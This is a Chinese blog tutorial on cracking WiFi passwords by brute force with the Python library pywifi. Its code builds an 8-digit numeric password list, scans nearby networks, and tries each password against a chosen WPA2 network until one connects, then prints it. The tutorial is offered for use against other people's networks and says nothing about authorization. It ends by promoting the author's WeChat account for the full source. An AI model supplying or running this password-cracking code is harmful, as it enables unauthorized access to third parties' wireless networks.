版权声明:原创不易,本文禁止抄袭、转载,侵权必究!
一、pywifi简介&安装
开发环境:Windows10 Python3.6.4
第三方库:pywifi-1.1.12
IDE :PyCharm/Sublime Text
pywifi简介:
pywifi是python中一个用于操作无线接口的第三方库,可以跨平台使用,支持Windows和Linux,在这里我们用来执行wifi的操作,包括连接、扫描、断开等
pywifi安装:
pip install comtypes -i https://pypi.doubanio.com/simplepip install pywifi -i https://pypi.doubanio.com/simple
pywifi-1.1.12依赖于comtypes,所以也需要安装一下comtypes
二、暴力构建WiFi密码
WiFi密码一般由数字(0-9)、字母(区分大小写)以及特殊字符(!@#&*.等)组成,为了方便教程的演示,这里仅显示由数字组成的8位字符,作为wifi密码存入txt文档,有些WiFi密码可能稍微复杂一点,延长字符长度或增加字母、特殊字符就行
代码如下:
astring = "1234567890" #可添加字母和特殊字符pwds = it.product(astring, repeat=8) #8位密码长度with open('pwd.txt', 'a', encoding='utf-8') as f: for pwd in pwds: f.write(''.join(pwd)) f.write(''.join('\n'))
有10位数字组成的暴力破解WiFi密码共有100000000种,内存占用约953.67MB,由此可见,暴力破解对内存的要求比较高
三、编码破解WiFi
WiFi扫描编码:
interface = self.wifi.interfaces()[0] #使用索引序号0获取第一个无线网卡interface.scan()print('扫描WiFi中,请稍后………………')time.sleep(1)print('扫描完成!\n' + '*' * 50)print('\n%s\t%s\t%s' % ('WiFi编号', 'WiFi信号', 'WiFi名称'))wifiList = interface.scan_results() #返回一个列表wifiNewList = []for w in wifiList: wifiNameAndSignal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8')) #解决乱码问题并返回元组 wifiNewList.append(wifiNameAndSignal)wifi_signal_and_name_list = sorted(wifiNewList, key=lambda i: i[0], reverse=True) # 按信号强度倒序index = 0while index < len(wifi_signal_and_name_list): print('%s\t\t\t%s\t\t\t%s' % (index, wifi_signal_and_name_list[index][0], wifi_signal_and_name_list[index][1])) index += 1print('\n' + '*' * 50)
扫描效果如下:
WiFi破解编码:
profile = pywifi.Profile() #创建连接文件(对象)profile.ssid = wifiName #wifi名称profile.auth = const.AUTH_ALG_OPEN #需要认证profile.akm.append(const.AKM_TYPE_WPA2PSK) #wifi默认加密算法profile.cipher = const.CIPHER_TYPE_CCMPprofile.key = pwdinterface.remove_all_network_profiles() #删除所有wifi连接文件tmp_profile = interface.add_network_profile(profile) #设置新的wifi连接文件interface.connect(tmp_profile) #开始尝试连接startTime = time.time()while time.time() - startTime < 1.5: if interface.status() == 4: print('连接成功!密码为:%s' % pwd) exit(0) else: print('正在用密码 %s 尝试破解…………' % pwd)
完整破解效果如下:
四、完整源码下载
关注我的原创公众号【小鸿星空科技】,回复【Python破解WiFi】关键词获取完整源码
五、作者Info
Author:南柯树下,Goal:让编程更有趣!
原创微信公众号:『小鸿星空科技』,专注于算法、爬虫,网站,游戏开发,数据分析、自然语言处理,AI等,期待你的关注,让我们一起成长、一起Coding!
版权声明:本文禁止抄袭、转载 ,侵权必究!
—— —— —— —— — END —— —— —— —— ————
欢迎扫码关注我的公众号
小鸿星空科技